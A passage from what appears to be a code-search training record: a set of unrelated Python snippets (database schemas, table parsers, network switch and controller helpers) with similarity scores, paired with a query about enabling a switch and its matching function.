userdata=self.userdata)\n cloudConfig =\\\n CloudConfiguration(cloudinit=cloudinitConfig,\n type=CloudConfiguration.Type('CLOUDINIT'))\n configSpec = ConfigurationSpec(cloud_config=cloudConfig)\n globalDnsSettings = GlobalDNSSettings()\n adapterMappingList = []\n customizationSpec =\\\n CustomizationSpec(configuration_spec=configSpec,\n global_dns_settings=globalDnsSettings,\n interfaces=adapterMappingList)\n createSpec = self.specs_svc.CreateSpec(name=specName,\n description=specDesc,\n spec=customizationSpec)\n self.specs_svc.create(spec=createSpec)\n print('{} has been created'.format(specName))\n print('-------------------------------------------------------------')", "def yield_table(\n self, table_name_and_type: Tuple[str, str]\n ) -> Iterable[Optional[CreateTableRequest]]:\n table_name, table_type = table_name_and_type\n schema_name = self.context.database_schema.name.__root__\n db_name = self.context.database.name.__root__\n try:\n\n columns, table_constraints = self.get_columns_and_constraints(\n schema_name=schema_name,\n table_name=table_name,\n db_name=db_name,\n inspector=self.inspector,\n )\n\n view_definition = self.get_view_definition(\n table_type=table_type,\n table_name=table_name,\n schema_name=schema_name,\n inspector=self.inspector,\n )\n\n table_request = CreateTableRequest(\n name=table_name,\n tableType=table_type,\n description=self.get_table_description(\n schema_name=schema_name,\n table_name=table_name,\n inspector=self.inspector,\n ),\n columns=columns,\n viewDefinition=view_definition,\n tableConstraints=table_constraints if table_constraints else None,\n databaseSchema=EntityReference(\n id=self.context.database_schema.id,\n type=\"databaseSchema\",\n ),\n tags=self.get_tag_labels(\n table_name=table_name\n ), # Pick tags from context info, if any\n )\n is_partitioned, partition_details = self.get_table_partition_details(\n table_name=table_name, schema_name=schema_name, inspector=self.inspector\n )\n if is_partitioned:\n table_request.tableType = TableType.Partitioned.value\n table_request.tablePartition = partition_details\n\n if table_type == TableType.View or view_definition:\n table_view = TableView.parse_obj(\n {\n \"table_name\": table_name,\n \"schema_name\": schema_name,\n \"db_name\": db_name,\n \"view_definition\": view_definition,\n }\n )\n self.context.table_views.append(table_view)\n\n yield table_request\n self.register_record(table_request=table_request)\n\n except Exception as exc:\n logger.debug(traceback.format_exc())\n logger.warning(f\"Unexpected exception to yield table [{table_name}]: {exc}\")\n self.status.failures.append(f\"{self.config.serviceName}.{table_name}\")", "def _define_tables(self):\n metadata = MetaData(bind=self.engine)\n Base = declarative_base(metadata=metadata)\n\n class Dataset(Base):\n __tablename__ = 'datasets'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(100), nullable=False)\n\n # columns necessary for loading/processing data\n class_column = Column(String(100), nullable=False)\n train_path = Column(String(200), nullable=False)\n test_path = Column(String(200))\n description = Column(String(1000))\n\n # metadata columns, for convenience\n n_examples = Column(Integer, nullable=False)\n k_classes = Column(Integer, nullable=False)\n d_features = Column(Integer, nullable=False)\n majority = Column(Numeric(precision=10, scale=9), nullable=False)\n size_kb = Column(Integer, nullable=False)\n\n def __repr__(self):\n base = \"<%s: %s, %d classes, %d features, %d rows>\"\n return base % (self.name, self.description, self.k_classes,\n self.d_features, self.n_examples)\n\n class Datarun(Base):\n __tablename__ = 'dataruns'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n dataset_id = Column(Integer, ForeignKey('datasets.id'))\n dataset = relationship('Dataset', back_populates='dataruns')\n\n description = Column(String(200), nullable=False)\n priority = Column(Integer)\n\n # hyperparameter selection and tuning settings\n selector = Column(String(200), nullable=False)\n k_window = Column(Integer)\n tuner = Column(String(200), nullable=False)\n gridding = Column(Integer, nullable=False)\n r_minimum = Column(Integer)\n\n # budget settings\n budget_type = Column(Enum(*BUDGET_TYPES))\n budget = Column(Integer)\n deadline = Column(DateTime)\n\n # which metric to use for judgment, and how to compute it\n metric = Column(Enum(*METRICS))\n score_target = Column(Enum(*[s + '_judgment_metric' for s in\n SCORE_TARGETS]))\n\n # variables that store the status of the datarun\n start_time = Column(DateTime)\n end_time = Column(DateTime)\n status = Column(Enum(*DATARUN_STATUS), default=RunStatus.PENDING)\n\n def __repr__(self):\n base = \"<ID = %d, dataset ID = %s, strategy = %s, budget = %s (%s), status: %s>\"\n return base % (self.id, self.dataset_id, self.description,\n self.budget_type, self.budget, self.status)\n\n Dataset.dataruns = relationship('Datarun', order_by='Datarun.id',\n back_populates='dataset')\n\n class Hyperpartition(Base):\n __tablename__ = 'hyperpartitions'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n datarun_id = Column(Integer, ForeignKey('dataruns.id'))\n datarun = relationship('Datarun', back_populates='hyperpartitions')\n\n # name of or path to a configured classification method\n method = Column(String(255))\n\n # list of categorical parameters whose values are fixed to define\n # this hyperpartition\n categorical_hyperparameters_64 = Column(Text)\n\n # list of continuous parameters which are not fixed; their values\n # must be selected by a Tuner\n tunable_hyperparameters_64 = Column(Text)\n\n # list of categorical or continuous parameters whose values are\n # always fixed. These do not define the hyperpartition, but their\n # values must be passed on to the method. Here for convenience.\n constant_hyperparameters_64 = Column(Text)\n\n # has the partition had too many errors, or is gridding done?\n status = Column(Enum(*PARTITION_STATUS),\n default=PartitionStatus.INCOMPLETE)\n\n @property\n def categoricals(self):\n \"\"\"\n A list of categorical variables along with the fixed values\n which define this hyperpartition.\n Each element is a ('name', HyperParameter) tuple.\n \"\"\"\n return base_64_to_object(self.categorical_hyperparameters_64)\n\n @categoricals.setter\n def categoricals(self, value):\n self.categorical_hyperparameters_64 = object_to_base_64(value)\n\n @property\n def tunables(self):\n \"\"\"\n A list of parameters which are unspecified and must be selected\n with a Tuner. Each element is a ('name', HyperParameter) tuple.\n \"\"\"\n return base_64_to_object(self.tunable_hyperparameters_64)\n\n @tunables.setter\n def tunables(self, value):\n self.tunable_hyperparameters_64 = object_to_base_64(value)\n\n @property\n def constants(self):\n return base_64_to_object(self.constant_hyperparameters_64)\n\n @constants.setter\n def constants(self, value):\n self.constant_hyperparameters_64 = object_to_base_64(value)\n\n def __repr__(self):\n return \"<%s: %s>\" % (self.method, self.categoricals)\n\n Datarun.hyperpartitions = relationship('Hyperpartition',\n order_by='Hyperpartition.id',\n back_populates='datarun')\n\n class Classifier(Base):\n __tablename__ = 'classifiers'\n\n # relational columns\n id = Column(Integer, primary_key=True, autoincrement=True)\n datarun_id = Column(Integer, ForeignKey('dataruns.id'))\n datarun = relationship('Datarun', back_populates='classifiers')\n hyperpartition_id = Column(Integer, ForeignKey('hyperpartitions.id'))\n hyperpartition = relationship('Hyperpartition',\n back_populates='classifiers')\n\n # name of the host where the model was trained\n host = Column(String(50))\n\n # these columns point to where the output is stored\n model_location = Column(String(300))\n metrics_location = Column(String(300))\n\n # base 64 encoding of the hyperparameter names and values\n hyperparameter_values_64 = Column(Text, nullable=False)\n\n # performance metrics\n cv_judgment_metric = Column(Numeric(precision=20, scale=10))\n cv_judgment_metric_stdev = Column(Numeric(precision=20, scale=10))\n test_judgment_metric = Column(Numeric(precision=20, scale=10))\n\n start_time = Column(DateTime)\n end_time = Column(DateTime)\n status = Column(Enum(*CLASSIFIER_STATUS), nullable=False)\n error_message = Column(Text)\n\n @property\n def hyperparameter_values(self):\n return base_64_to_object(self.hyperparameter_values_64)\n\n @hyperparameter_values.setter\n def hyperparameter_values(self, value):\n self.hyperparameter_values_64 = object_to_base_64(value)\n\n @property\n def mu_sigma_judgment_metric(self):\n # compute the lower confidence bound on the cross-validated\n # judgment metric\n if self.cv_judgment_metric is None:\n return None\n return (self.cv_judgment_metric - 2 *\n self.cv_judgment_metric_stdev)\n\n def __repr__(self):\n params = ', '.join(['%s: %s' % i for i in\n list(self.hyperparameter_values.items())])\n return \"<id=%d, params=(%s)>\" % (self.id, params)\n\n Datarun.classifiers = relationship('Classifier',\n order_by='Classifier.id',\n back_populates='datarun')\n Hyperpartition.classifiers = relationship('Classifier',\n order_by='Classifier.id',\n back_populates='hyperpartition')\n\n self.Dataset = Dataset\n self.Datarun = Datarun\n self.Hyperpartition = Hyperpartition\n self.Classifier = Classifier\n\n Base.metadata.create_all(bind=self.engine)", "def setup_table_for_epochs(table, timeseries, tag):\n table = table.copy()\n indices = np.searchsorted(timeseries.timestamps[:], table['start_time'].values)\n if len(indices > 0):\n diffs = np.concatenate([np.diff(indices), [table.shape[0] - indices[-1]]])\n else:\n diffs = []\n\n table['tags'] = [(tag,)] * table.shape[0]\n table['timeseries'] = [[[indices[ii], diffs[ii], timeseries]] for ii in range(table.shape[0])]\n return table", "def install(cls):\n\n\t\t# Go through each Record type\n\t\tfor o in cls._install:\n\n\t\t\t# Install the table\n\t\t\tif not o.table_create():\n\t\t\t\tprint(\"Failed to create `%s` table\" % o.tableName())", "def initialize_tables(database_connection_object, logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)", "def post_interface_route_table_create(self, resource_dict):\n pass", "def add_tables(self, *tables):\n \n for t in tables:\n # if table contains actual aperture magnitudes\n if \"mag_calib_unc\" in t.colnames:\n LightCurve.__mag_table_append(self, t.copy())\n # if table contains limiting magnitudes\n else: \n LightCurve.__limmag_table_append(self, t.copy())", "def __init__(self, *args, **kwargs):\n SpecMessage.__init__(self, '<IiiiIIiiIII80s')\n\n if len(args) > 0:\n self.init(*args, **kwargs)", "def extract_table_byte_table(first_line_idx, lineIN_list): \n DEBUG_byte_table = False\n if DEBUG_byte_table: header = '>>>DEBUG_byte_table:\\t'\n if DEBUG_byte_table: print header, 'first_line_idx', first_line_idx \n if DEBUG_byte_table: from pprint import pprint as pp\n my_lineOUT_list = []\n my_lineIN_list = []\n\n #OBS header_of_the_table = 'Bytes'\n cell0_without_tab_list = [\n ['17', '105-'],\n ['18', '111-'],\n ['19', '131-'],\n ['19', '148-'],\n ['19', '165-'],\n ['19', '168-'],\n ['19', '184-'],\n ['19', '186-'],\n ['19', '188-'],\n ['19', '193-'],\n ['19', '196-'],\n ['19', '212-'],\n ['19', '224-'],\n ['34', '128-'],\n ['34', '130-'],\n ['34', '132-'],\n ['34', '134-'],\n ['34', '136-'],\n ['34', '144-'],\n ['34', '146-'],\n ['34', '148-'],\n ['34', '150-'],\n ['34', '152-'],\n ['34', '160-'],\n ['34', '176-'],\n ['34', '178-'],\n ['34', '180-'],\n ['34', '182-'],\n ['34', '184-'],\n ['34', '186-'],\n ['34', '188-'],\n ['34', '190-'],\n ['34', '192-'],\n ['34', '194-'],\n ['34', '196-'],\n ['34', '198-'],\n ['34', '200-'],\n ['34', '208-'],\n ]\n tab_within_cell_list = [\n ] \n merged_cell_list = [\n # text in this cell is merged cells\n '\\tSee Table',\n '\\t-',\n ] \n #unwanted_line_list = [\n #['19', 'Base ID fields'],\n #['19', 'Extended ID fields'],\n #['19', 'Vendor Specific ID fields'],\n #]\n #ignore_blank_line = [\n # '13',\n #]\n\n \n DEBUG0 = False\n if DEBUG0: header0 = '>>>DEBUG0:\\t'\n if DEBUG0: \n start_line = 1720\n end_line = start_line + 100\n for line_idx in range(start_line, end_line+10):\n #for line_idx in range(len(new_lineIN_list)):\n print header0, '>>>>>>>>>>>>>>', '%d(%s)'%(line_idx, lineIN_list[line_idx].rstrip())\n #if new_lineIN_list[line_idx].startswith('255\\t'):\n # break\n\n DEBUG1 = False\n if DEBUG1: header1 = '>>>DEBUG1:\\t'\n\n for line_idx in range(first_line_idx+1, len(lineIN_list) ):\n\n #this_line = lineIN_list[line_idx]\n #if DEBUG1: print header1, 1000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n #this_line = lineIN_list[line_idx].replace('\\n', '') # strip EOL only, not other whtite space\n #if DEBUG1: print header1, 1002, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n this_line = lineIN_list[line_idx].rstrip('\\n') # strip EOL only, not other whtite space\n #if DEBUG1: print header1, 1004, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n if DEBUG1: print header1, 1000, 'This table: len(my_lineIN_list)(%d)'%(len(my_lineIN_list))\n\n # Fix unwantted tab in original PDF file: replace unwanted tab into a space\n for tmp_str in tab_within_cell_list:\n if DEBUG1: print header1, 1500, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n this_line = this_line.replace('%s\\t'%(tmp_str), '%s '%(tmp_str), 1)\n\n if len(this_line) != 0:\n #if re.search('^ *$', this_line): # look for zero or more space, but do not touch the tab\n if DEBUG1: print header1, 2000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n try:\n header_of_the_table \n if DEBUG1: print header1, 2100, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n except NameError:\n header_of_the_table = re.sub('\\t.*', '', this_line) # extract only the first cell\n if DEBUG1: print header1, 2200, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n # Ignore unwanted line within a table\n #for this_table, this_value in unwanted_line_list:\n # if this_table in lineIN_list[first_line_idx] and this_value in this_line:\n # if DEBUG_byte_table: print header, 'SKIPPED %3d: 2000, this_line\\t(%s)'%(line_idx, this_line)\n # pass\n # else:\n # my_lineIN_list.append(this_line)\n my_lineIN_list.append(this_line)\n else:\n # The table itself is between 2 blank lines, except TABLE 13\n #if any(this_table in lineIN_list[first_line_idx] for this_table in ignore_blank_line):\n # if '13' in lineIN_list[first_line_idx]:\n # my_lineIN_list.append('\\t') # line for bit 0 has a missing trailing tab\n # pass\n\n # The table itself is between 2 blank lines\n if DEBUG1: print header1, 6000, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n if len(my_lineIN_list) != 0:\n if DEBUG1: print header1, 6400, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n break\n if DEBUG1: print header1, 6600, 'line_idx(%d). (this_line)(%s)'%(line_idx, this_line)\n\n DEBUG2 = False\n if DEBUG2: header2 = '>>>DEBUG2:\\t'\n if DEBUG2: \n print header2, 'This table: len(my_lineIN_list)(%d)'%(len(my_lineIN_list))\n for line_idx in range(len(my_lineIN_list)):\n print header2, 'my_lineIN_list[%d](%s):'%(line_idx, my_lineIN_list[line_idx])\n\n # Make the text line compatible with CSV syntax\n line_idx = 0\n while line_idx < len(my_lineIN_list):\n this_line = my_lineIN_list[line_idx]\n this_delimiter_count = this_line.count('\\t')\n\n if DEBUG_byte_table: print\n if DEBUG_byte_table: print header, '%3d: 2000, this_line\\t(%s)'%(line_idx, this_line)\n\n if this_line.startswith(header_of_the_table):\n #if DEBUG_byte_table: print header, '%3d: 2010, this_line\\t(%s)'%(line_idx, this_line)\n # header of the table\n delimiter_count = this_delimiter_count\n this_line = text_to_csv_syntax(this_line) # text line compatible with CSV syntax\n this_line = text_to_excessive_space_on_hyphen(this_line) # remove the space in 'xx- xx', or 'xx -xx'\n my_lineOUT_list.append(this_line)\n\n else:\n #if DEBUG_byte_table: print header, '%3d: 2020, this_line\\t(%s)'%(line_idx, this_line)\n # Get one or more line until enough cells: \n while this_line.count('\\t') < delimiter_count:\n # append next line\n if line_idx+1 < len(my_lineIN_list):\n if DEBUG_byte_table: print header, '%3d: 2035, my_lineIN_list[line_idx+1]\\t(%s)'%(line_idx, my_lineIN_list[line_idx+1])\n #if any(my_lineIN_list[line_idx+1].startswith(z) for z in (merged_cell_list)):\n if any(z in my_lineIN_list[line_idx] for z in (merged_cell_list)):\n if DEBUG_byte_table: print header, '%3d: 2040, this_line\\t(%s)'%(line_idx, this_line)\n break # Done because a line with merged cell has less total number of cells \n line_idx += 1\n this_line += ' ' + my_lineIN_list[line_idx]\n\n if DEBUG_byte_table: print header, '%3d: 3000, this_line\\t(%s)'%(line_idx, this_line)\n else:\n break\n\n # Has enough cells: append one or more line if these line has no tab except \n # the line start with a specific text\n while line_idx+1 < len(my_lineIN_list) and not '\\t' in my_lineIN_list[line_idx+1]:\n #if any (my_lineIN_list[line_idx+1].startswith(z) for tbl, z in cell0_without_tab_list):\n\n DEBUG_4 = False\n if DEBUG_4: header = '>>>DEBUG_4:\\t'\n if DEBUG_4:\n pass\n #if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n #print header, cell0_without_tab_list\n print header, cell0_without_tab_list\n #print header, for this_table, z in cell0_without_tab_list):\n #print header, if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n for this_table, z in cell0_without_tab_list:\n print header, 'this_table(%r), z(%r), lineIN_list[first_line_idx](%r), my_lineIN_list[line_idx+1](%r)'%(this_table, z, lineIN_list[first_line_idx], my_lineIN_list[line_idx+1]),\n print this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z)\n\n\n if any (this_table in lineIN_list[first_line_idx] and my_lineIN_list[line_idx+1].startswith(z) for this_table, z in cell0_without_tab_list):\n break\n else:\n line_idx += 1\n this_line += ' ' + my_lineIN_list[line_idx]\n if DEBUG_byte_table: print header, '%3d: 4020, this_line\\t(%s)'%(line_idx, this_line)\n if DEBUG_byte_table: print header, '%3d: 4030, text appended\\t(%s)'%(line_idx, my_lineIN_list[line_idx])\n\n this_line = text_to_csv_syntax(this_line) # text line compatible with CSV syntax\n this_line = text_to_excessive_space_on_hyphen(this_line) # remove the space in 'xx- xx', or 'xx -xx'\n my_lineOUT_list.append(this_line)\n if DEBUG_byte_table: print header, '%3d: 9999, my_lineOUT_list[-1]\\t(%s)'%(line_idx, my_lineOUT_list[-1])\n line_idx += 1\n\n if DEBUG_byte_table:\n for str2 in my_lineOUT_list: print header, 'str2(%r)'%(str2)\n return my_lineOUT_list", "def __init__(self, schema_row):\n self.schema = []\n for field in schema_row['fields']:\n self.schema.append(field['type'])", "def start_table(self):\n self.col_widths = []\n self.result = \"\"" ]
[ "0.52702624", "0.51661", "0.51060444", "0.5094332", "0.50876445", "0.50695586", "0.50232565", "0.49792466", "0.49553454", "0.49386698", "0.49274278", "0.49077904", "0.4889465", "0.48876804", "0.48618603", "0.48576298", "0.48565733", "0.48539078", "0.4839813", "0.48349887", "0.48339733", "0.48286325", "0.48004246", "0.47759512", "0.47651866", "0.47467768", "0.4742607", "0.47310084", "0.46929148", "0.468556", "0.46852288", "0.4683481", "0.46700856", "0.465237", "0.46491137", "0.46291593", "0.46266803", "0.46239597", "0.46189338", "0.46158814", "0.46156737", "0.46028277", "0.45988107", "0.45983928", "0.45937237", "0.45629358", "0.45588264", "0.4553068", "0.45518714", "0.45516944", "0.4536049", "0.4534412", "0.45334524", "0.45324546", "0.4527784", "0.4527784", "0.45183995", "0.4501756", "0.44962424", "0.44898555", "0.4483053", "0.4481861", "0.44728413", "0.44727623", "0.4468818", "0.44684574", "0.4464714", "0.44475922", "0.44460234", "0.44440016", "0.4443378", "0.44417518", "0.44384107", "0.44353884", "0.44351754", "0.44349846", "0.44304538", "0.442999", "0.44266653", "0.4417068", "0.44142175", "0.44136557", "0.44060728", "0.44053015", "0.4402293", "0.44013962", "0.43992466", "0.43978137", "0.43925777", "0.43917558", "0.43892244", "0.43847278", "0.43807763", "0.43794182", "0.43786326", "0.43778607", "0.43774024", "0.4374664", "0.43717965", "0.4357933" ]
0.7456325
0
Enable the switch instance Start the traffic manager threads and allow packets to enter the processor chain
def enable(self): if not self.tm_started: for name, tm in self.air_traffic_manager.items(): logging.debug("Starting tm %s" % name) tm.start() tm_started = True logging.debug("Enabling switch %s" % self.name) self.disabled = False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def enable(self):\n self.switch.enable()\n self._enabled = True", "def start_sending_to_switch(self):\n self.switch_active = True\n for message in self.internal_switch_buffer:\n self.switch.buffer.append(message)\n self.internal_switch_buffer = []", "def launch ():\n def start_switch (event):\n log.info(\"switch %s has come up\" % event.dpid)\n log.info(event.connection.ports)\n sw = switches_by_dpid.get(event.dpid)\n\n if sw is None:\n # New switch\n sw = TopoSwitch(event.connection)\n switches_by_dpid[event.dpid] = sw\n sw.connect(event.connection)\n else:\n sw.connect(event.connection)\n core.openflow.addListenerByName(\"ConnectionUp\", start_switch)", "def connect_to_switches(self):\n for p4switch in self.topo.get_p4switches():\n thrift_port = self.topo.get_thrift_port(p4switch)\n self.controllers[p4switch] = SimpleSwitchThriftAPI(thrift_port)", "def _enable(self):\n sub = multiprocessing.Process(target=subproc)\n sub.start()", "def enable(self):\n self.fisica.open()\n self.rx.threadStart()\n self.tx.threadStart()", "def start():\n Networker.stop()\n Networker.Instance = Networker()", "def _start(self):\n\n super(PySwitchLibApiDaemonRunner, self)._start()", "def enable_relays(self):\n #ensure clock and data are low\n self.e.clear_bit(7)\n self.e.clear_bit(5)\n time.sleep(0.01)\n\n #pulse the clock line\n self.e.set_bit(7)\n time.sleep(0.01)\n self.e.clear_bit(7)", "def _init_threads(self):\n\n startTh = Thread(name='InitialStart', target = self._singleUpdate, args=(self.outPs, ))\n self.threads.append(startTh)\n\n sendTh = Thread(name='SteeringListen',target = self._listen_for_steering, args = (self.inPs[0], self.outPs, ))\n self.threads.append(sendTh)", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "def on_pre_enter(self):\n self.setup()\n self.start()", "def start(self):\n if self._start_event is None:\n _call_spawn_callbacks(self)\n hub = get_my_hub(self) # pylint:disable=undefined-variable\n self._start_event = hub.loop.run_callback(self.switch)", "def start_controller(self, controller):\n srv = SwitchControllerRequest()\n srv.start_controllers = [controller]\n srv.strictness = SwitchControllerRequest.BEST_EFFORT\n self.switch_controller(srv)", "def force_switch_on(self):\n self.turn_on_modem()", "def startManager(self):\n\t\tlogging.info(\"----->>>The DeviceDataManager will be started\")\n\t\tself.sysPerfManager.startManager()\n\t\tself.sensorAdapterManager.startManager()\n\t\tif self.enableRedis:\n\t\t\tself.redisClient.connectClient()\n\t\t\n\t\tif self.enableMqtt:\n\t\t\tself.mqttClient.connectClient()", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)", "def server_activate(self):\n\t\tpass", "def activate(self):\n self.start()", "def start_traffic(self):\n raise NotImplementedError", "def turn_on(self, **kwargs):\n if not self.is_on:\n _LOGGER.debug(\"Sending START command to: %s\", self._name)\n self._api.control('START')\n self._mower_status = STATUS_EXECUTING_START\n self.schedule_update_ha_state()", "def start(self):\n def f():\n if (self.started): return\n self.started = True\n with client.ServerProxy(self.host) as proxy:\n while (not self.req_shutdown):\n self.update_speed(proxy)\n time.sleep(self.com_freq)\n self.started = False\n self.req_shutdwon = False\n\n Thread(target=f).start()", "def start():\n global logger\n global client\n global config\n global device\n global circles_config\n global circles\n global mac2circle\n logger = LoggerClient.open(\"PlugwiseMonitor\")\n if not verbose: logger.config(logger.levels.WARNING, logger.schedules.DAILY)\n config = Utils.getconfig(\"plugwise\", logger)\n assert config is not None\n device = plugwise_api.Stick(logger, DEFAULT_SERIAL_PORT)\n\n # circles_config is a list of dictionaries: name, mac, desc. state field is\n # added in next loop to track its value so it can be used to only send\n # messages in state transitions. power1s and power8s field is used to check\n # the relative difference in power in order to reduce the network overhead.\n circles_config = config[\"circles\"]\n circles = []\n mac2circle = {}\n for circle_data in circles_config:\n mac = circle_data[\"mac\"]\n circles.append( plugwise_api.Circle(logger, mac, device, {\n \"name\" : circle_data[\"name\"],\n \"location\" : circle_data[\"desc\"],\n \"always_on\" : \"False\",\n \"production\" : \"True\"\n }) )\n mac2circle[mac] = circles[-1]\n circle_data[\"state\"] = \"NA\"\n for v in OUTPUT_LIST:\n circle_data[\"power\" + v[\"suffix\"]] = -10000.0\n circle_data[\"when\" + v[\"suffix\"]] = 0.0\n \n client = Utils.getpahoclient(logger, __configure)\n client.loop_start()", "def start(self):\n self.active = True", "def init(self):\n logger.info(\"Turn on antenna power\")\n logger.info(\"Register on the network\")\n self.emit('provider-modified', \"Charlie Telecom\")\n self.network_strength = 100\n yield tichy.Service.get('ConfigService').wait_initialized()\n self.config_service = tichy.Service.get(\"ConfigService\")\n logger.info(\"got config service\")\n self.values = self.config_service.get_items(\"call_forwarding\")\n if self.values != None: self.values = dict(self.values)\n logger.info(\"realized values is none\")\n self.SettingReason = tichy.settings.ListSetting('Call Forwarding', 'Reason', tichy.Text, value='unconditional', setter=self.ForwardingSetReason, options=[\"unconditional\",\"mobile busy\",\"no reply\",\"not reachable\",\"all\",\"all conditional\"], model=tichy.List([ListSettingObject(\"unconditional\", self.action),ListSettingObject(\"mobile busy\", self.action),ListSettingObject(\"no reply\", self.action),ListSettingObject(\"not reachable\", self.action),ListSettingObject(\"all\", self.action),ListSettingObject(\"all conditional\", self.action)]), ListLabel = [('title','name')])\n self.SettingChannels = tichy.settings.Setting('Call Forwarding', 'channels', tichy.Text, value=self.ForwardingGet('class'), setter=self.ForwardingSetClass, options=[\"voice\",\"data\",\"voice+data\",\"fax\",\"voice+data+fax\"])\n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Target Number', tichy.Text, value=self.ForwardingGet('number'), setter=self.ForwardingSetNumber)\n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Timeout', tichy.Text, value=self.ForwardingGet('timeout'), setter=self.ForwardingSetTimeout)\n \n if len(self.logs) == 0: \n for i in range(3):\n call = Call('0049110', direction='out')\n self.logs.insert(0, call)\n yield None", "def EnableCPU():\n global option\n option['device'] = 'CPU'", "def start(self):\n for tlight in self.trafficLights:\n self.trafficLights[tlight].start()\n self.globalTimer = Timer(1, self.step)\n self.globalTimer.start()", "def connect(self):\n self.start()", "def __enable_connections(self):\r\n pass", "def enable(self, *args, **kwargs):\n pass", "def enable_motor():\n print('Enabling motor')\n start_motor = '{\"id\" : \"Motor1\", \"enabled\" : \"1\"}'\n SERIAL_PARENT.send(start_motor)\n OUTGOING.append(start_motor)", "def enable_receiver(self):\n self.set_receiver(True)", "def enable(self):\n self.enabled = True", "def enable(self):\n self.enabled = True", "def start(self):\n self.capturing = True\n print \"Connecting Sender\"\n self.sock.connect(self.addr)\n self.capture_thread.start()\n print \"Starting Sender\"\n self.sending_thread.start()", "def start_switch(self, switch_init_wait=3, route_mac=ROUTER_MAC):\n switch_id = sai_thrift_create_switch(\n self.test_obj.client, init_switch=True, src_mac_address=route_mac)\n self.test_obj.assertEqual(self.test_obj.status(), SAI_STATUS_SUCCESS)\n\n print(\"Waiting for switch to get ready, {} seconds ...\".format(\n switch_init_wait))\n time.sleep(switch_init_wait)\n return switch_id", "async def async_turn_on(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.force_update()", "def enable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = ENABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def start_server(self):\n if self.esp_mgr.ap:\n self.server_socket = adafruit_esp32spi_socket.socket()\n self.esp_mgr.esp.start_server(23, self.server_socket.socknum)", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def enable(self) -> None:", "def start(self):\n self.microblaze.run()\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0)\n self.load_switch_config(self.iop_switch_config)", "def _enable(self):\n self.debug_log(\"Enabling...\")\n self._register_handlers()", "def start(self):\n\n if self.__bus_controller == None:\n print(\"can't start please pass me the needed dictionaries\")\n\n self.__global_messages = {\"kick reason\": \"\", \"free text\": \"\"}\n self.__lock_data = False\n self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.stop = False\n __main_loop = threading.Thread(target=self.__main_loop, args=(), name=\"bus updater\")\n __main_loop.start()", "def enable_gateway(self, enable_gateway):\n\n self._enable_gateway = enable_gateway", "def enable(self):\n pass", "async def async_turn_on(self, **kwargs: Any) -> None:\n run_time = self._manual_preset_runtime / 60\n if run_time == 0:\n _LOGGER.warning(\n \"Switch %s manual preset runtime is 0, watering has defaulted to %s minutes. Set the manual run time on your device or please specify number of minutes using the bhyve.start_watering service\",\n self._device_name,\n int(DEFAULT_MANUAL_RUNTIME.seconds / 60),\n )\n run_time = 5\n\n await self.start_watering(run_time)", "def tc_start(self, datapath, dpae_port):\n dpid = datapath.id\n self.logger.info(\"Starting TC to DPAE on datapath=%s, dpae_port=%s\",\n dpid, dpae_port)\n switch = self.switches[dpid]\n #*** Check if Active or Passive TC Mode:\n mode = self.main_policy.tc_policies.mode\n self.logger.info(\"TC mode=%s\", mode)\n #*** TBD, deal with context:\n context = self.context_default\n #*** Set up group table to send to DPAE:\n # NEEDS OVS 2.1 OR HIGHER SO COMMENTED OUT FOR THE MOMENT\n # ALSO NEEDS CODE THAT CAN CATER FOR MULTIPLE DPAE\n #switch.flowtables.add_group_dpae(out_port)\n\n if self.main_policy.identity.lldp:\n #*** Install FEs to send LLDP Identity indicators to 